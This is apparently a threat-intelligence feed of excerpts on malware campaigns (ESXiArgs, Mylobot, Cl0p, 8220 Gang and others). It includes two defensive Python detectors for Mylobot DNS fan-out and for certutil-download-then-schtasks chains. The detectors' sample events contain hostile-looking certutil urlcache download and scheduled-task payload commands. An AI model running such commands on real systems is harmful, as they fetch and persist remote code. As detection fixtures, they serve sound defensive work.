8220 Gang is a low-skill crimeware actor known for infecting cloud hosts through n-day vulnerabilities and remote access brute forcing. We have previously detailed how 8220 expanded its botnet and rotated its infrastructure. Since our last write-up in October, the group has again switched to new infrastructure and samples, providing us with an opportunity to share an educational walkthrough of the process of investigating cybercrime activity that may be useful to new or less experienced SOC teams, analysts and researchers.…
Tag: MONITOR
Threat Actors (TAs) are constantly devising new methods to infect users for various reasons, such as avoiding detection from anti-virus solutions, increasing the chances of successfully infecting their targets, and inventive ways to compromise their victims.…
DarkCloud is an Information Stealer Malware. It was first spotted by researchers in 2022. Such malware is designed to collect sensitive information from a victim’s computer or mobile device. Information stealers can be used to gather a variety of data, including passwords, credit card numbers, social security numbers, and other personal or financial information.…
Executive Summary
On February 3, European hosting providers and computer emergency response teams (CERTs) began warning of a widespread ransomware campaign exploiting CVE-2021-21974, a VMware ESXi vulnerability for which a patch has been available since February 2021. Shortly after the warnings' publication, SecurityScorecard developed an emergency informational signal to give customers visibility into potentially impacted servers.…
Redline Stealer is a type of malware that steals sensitive information from infected computers. The malware is known for its ability to bypass antivirus software and remain undetected on a victim’s computer for an extended period. In this essay, we will discuss the Redline Stealer malware, its history, its capabilities, and its impact.…
EclecticIQ researchers observed multiple weaponized phishing emails probably targeting the Security Service of Ukraine (SSU), NATO allies like Latvia, and private companies such as Culver Aviation – a Ukrainian aviation company. Multiple overlaps between these incidents and previous attacks of the Gamaredon APT group (4), such as command and control infrastructures and adversary techniques, helped analysts to highly likely attribute these latest attacks to the Gamaredon group.…
Red team operations are fundamental for achieving an adequate cybersecurity maturity level, so many commercial C2 frameworks have emerged to help manage security tests. However, the same tooling can be used by attackers to carry out cyber intrusions.
One of the most emblematic examples of this phenomenon is "Brute Ratel", a commercial Red Team Operations framework developed by Chetan Nayak, an expert red teamer formerly of both Mandiant and CrowdStrike, which, since last year, has been used by attackers in both cybercrime and APT operations.…
By John Fokker, Alfred Alvarado, Tim Hux, Jeffrey Sman, Joao Marques · February 09, 2023
Figure 1: Global Telemetry from Trellix ATLAS for IPs connecting to port 427
Introduction: Early this week, VMware issued a publication regarding a massive global ransomware campaign targeting "End of General Support (EOGS) and/or significantly out-of-date ESXi products."…
One of the largest universities in Israel was recently targeted by a new ransomware called "DarkBit", and the identity of the Threat Actor (TA) behind the attack is still being investigated. While it is uncertain whether the perpetrator is a disgruntled employee, a pro-Palestinian activist, or a combination of both, the ransom note and social media accounts of the DarkBit group may offer some clues about their motives.…
For each of these domains, the sample tries to connect to many of its subdomains. Most subdomains start with the letter x, w, or m, followed by a number. In this sample, the first hardcoded domain is fywkuzp[.]ru:7432, and we could observe an infected machine trying to connect to the following domains:
In the end, Mylobot produces thousands of DNS requests, which makes it quite noisy.…
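The subdomain pattern and the volume of DNS traffic described above are enough to build a simple fan-out detector. The following Python is an added example and is not code from the original write-up or from the Mylobot sample: it parses constructed DNS query log lines (source IP and queried name), keeps only names whose leftmost label matches the x/w/m-plus-digits pattern, and raises an alert when one host has queried at least `threshold` distinct such subdomains under the same registered domain. The log format, the two-label "registered domain" approximation (no public suffix list), and the threshold value are all assumptions made for the example.

```python
import re
from collections import defaultdict

# Leftmost label shape described in the write-up: x, w or m followed by digits.
MYLOBOT_LABEL = re.compile(r"^[xwm]\d+$")

# Constructed sample log, one "<source_ip> <queried_name>" per line.
# Not taken from the original page; the first hardcoded domain from the
# write-up is reused as the queried zone.
SAMPLE_DNS_LOG = """\
10.0.0.5 x1.fywkuzp.ru
10.0.0.5 x2.fywkuzp.ru
10.0.0.5 w17.fywkuzp.ru
10.0.0.5 m3.fywkuzp.ru
10.0.0.5 m3.fywkuzp.ru
10.0.0.5 w42.fywkuzp.ru
10.0.0.5 www.example.com
10.0.0.7 m1.example.org
10.0.0.7 mail.example.org
10.0.0.9 x9.example.net
"""


def registered_domain(name):
    """Assumption: the last two labels are the registered domain.

    Good enough for the sample; a real deployment would consult a public
    suffix list so that e.g. example.co.uk is not collapsed to co.uk.
    """
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else name.lower()


def parse_dns_log(text):
    """Yield (source_ip, fqdn) tuples, skipping malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue
        yield parts[0], parts[1].lower().rstrip(".")


def mylobot_fanout(text, threshold=5):
    """Return {(source_ip, registered_domain): distinct_subdomain_count}
    for every host/domain pair whose count of distinct Mylobot-style
    subdomains reaches the threshold.

    The threshold of 5 is an example value; the write-up describes thousands
    of requests per infected machine, so production tuning would be higher.
    """
    seen = defaultdict(lambda: defaultdict(set))
    for src, name in parse_dns_log(text):
        labels = name.split(".")
        if len(labels) < 3:
            continue  # need at least one subdomain label under the zone
        if MYLOBOT_LABEL.match(labels[0]):
            seen[src][registered_domain(name)].add(labels[0])

    alerts = {}
    for src, domains in seen.items():
        for domain, subs in domains.items():
            if len(subs) >= threshold:
                alerts[(src, domain)] = len(subs)
    return alerts


if __name__ == "__main__":
    for (src, domain), count in sorted(mylobot_fanout(SAMPLE_DNS_LOG).items()):
        print(f"ALERT {src} queried {count} distinct x/w/m subdomains of {domain}")
```

Counting distinct labels rather than raw queries keeps a single retried lookup from inflating the score, and grouping by registered domain means the detector still fires when the malware rotates through its list of hardcoded zones.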
On 02 February 2023, an alert triggered in a Huntress-protected environment. At first glance, the alert itself was fairly generic – a combination of certutil using the urlcache flag to retrieve a remote resource and follow-on scheduled task creation – but further analysis revealed a more interesting set of circumstances.…
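The alert described above combines two individually common events, certutil fetching a remote resource with the urlcache flag and a scheduled task being created shortly afterwards on the same host. The following Python is an added example and not Huntress's detection logic: it correlates constructed process-creation events (timestamp, host, image, command line) and alerts when a schtasks /create follows a certutil urlcache invocation on the same host within a time window. The event format, the 10-minute window, and the hostnames and documentation-range IP in the sample are all assumptions made for the example.

```python
import re
from datetime import datetime, timedelta

# certutil invoked with the urlcache verb (either -urlcache or /urlcache).
URLCACHE = re.compile(r"(?i)certutil(\.exe)?\b.*[-/]urlcache")
# schtasks creating a task (the /create verb).
TASK_CREATE = re.compile(r"(?i)schtasks(\.exe)?\b.*/create")

# Constructed sample events: (iso_timestamp, host, image, command_line).
# Not from the original page; 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    ("2023-02-02T10:00:00", "WS01", "certutil.exe",
     "certutil.exe -urlcache -split -f http://203.0.113.10/a.txt C:\\Users\\Public\\a.txt"),
    ("2023-02-02T10:00:20", "WS01", "schtasks.exe",
     "schtasks.exe /create /sc minute /mo 5 /tn Updater /tr C:\\Users\\Public\\a.exe"),
    # Benign certutil use followed by a benign schtasks query: must not alert.
    ("2023-02-02T11:30:00", "WS02", "certutil.exe",
     "certutil.exe -hashfile C:\\file.bin SHA256"),
    ("2023-02-02T11:30:05", "WS02", "schtasks.exe", "schtasks.exe /query"),
    # Same pair but an hour apart: outside the default window.
    ("2023-02-02T12:00:00", "WS03", "certutil.exe",
     "certutil -urlcache -f http://203.0.113.10/b.txt b.txt"),
    ("2023-02-02T13:00:00", "WS03", "schtasks.exe",
     "schtasks.exe /create /tn X /tr b.exe /sc onlogon"),
]


def correlate(events, window_minutes=10):
    """Return [(host, certutil_ts, schtasks_ts)] for each task creation that
    follows a certutil urlcache download on the same host within the window.

    The window length is an example value chosen for the sample data.
    """
    window = timedelta(minutes=window_minutes)
    pending = {}  # host -> list of certutil urlcache timestamps seen so far
    alerts = []
    # ISO-8601 timestamps sort correctly as strings, so this orders by time.
    for ts_str, host, _image, cmd in sorted(events, key=lambda e: e[0]):
        ts = datetime.fromisoformat(ts_str)
        if URLCACHE.search(cmd):
            pending.setdefault(host, []).append(ts)
        elif TASK_CREATE.search(cmd):
            recent = [t for t in pending.get(host, [])
                      if timedelta(0) <= ts - t <= window]
            if recent:
                # Report the most recent qualifying download for this host.
                alerts.append((host, recent[-1].isoformat(), ts.isoformat()))
    return alerts


if __name__ == "__main__":
    for host, dl_ts, task_ts in correlate(SAMPLE_EVENTS):
        print(f"ALERT {host}: certutil urlcache at {dl_ts}, schtasks /create at {task_ts}")
```

Requiring the two stages on the same host and in order is what separates this from two noisy single-event rules; widening the window trades missed slow-moving intrusions against more false positives from unrelated administrative activity.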
As part of the ReversingLabs research team’s ongoing surveillance of open source repositories, we have identified aabquerys, a malicious npm package that downloads second and third stage malware payloads to systems that have downloaded and run the npm package. …
Note: This Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and various ransomware threat actors. These #StopRansomware advisories detail historically and recently observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware.…
SentinelLabs observed the first ELF variant of Cl0p (also known as Clop) ransomware targeting Linux systems on the 26th of December 2022.…
On February 3rd, CERT-FR warned users about a ransomware attack targeting VMware ESXi servers to deploy ESXi Args Ransomware. The report also stated that the Threat Actors (TAs) were leveraging a two-year-old vulnerability tracked as CVE-2021-21974. According to VMware, ESXi versions 7.0 before ESXi70U1c-17325551, 6.7 before ESXi670-202102401-SG, and 6.5 before ESXi650-202102101-SG contain a heap overflow vulnerability in OpenSLP.…
Since 2016, Mirai has been an active botnet that targets vulnerable Linux-based networking devices. The botnet exploits vulnerabilities in devices such as routers, IP cameras, and other IoT devices to gain complete control over the machine.…
In September of last year, our Incident Response team was called to an incident that was identified as an attempt at social engineering an online customer service platform. Thanks to custom-built rules and extensive employee awareness training, we were able to push back these threats. By ingesting the tactics, techniques and procedures (TTPs) of the incident into our autonomous enrichment technology, Arpia, we were able to detect and respond to three other incidents, preventing our clients from being compromised by the mysterious threat actor.…
Threat Actors (TAs) are using spam emails to trick individuals into downloading malware, such as Remote Access Trojans (RATs) and Stealers, to infect their devices and steal sensitive information. Cyble Research & Intelligence Labs (CRIL) closely monitors different malware families and routinely publishes informative blogs to educate our readers.…
Threat Actors (TAs) continuously adopt new tactics for infecting users for several reasons, including avoiding detection by anti-virus solutions, increasing the likelihood of successful infections, and seeking the challenge of creating new methods of infecting victims.
Recently, several malware families have been spotted using OneNote attachments in their spam campaigns.…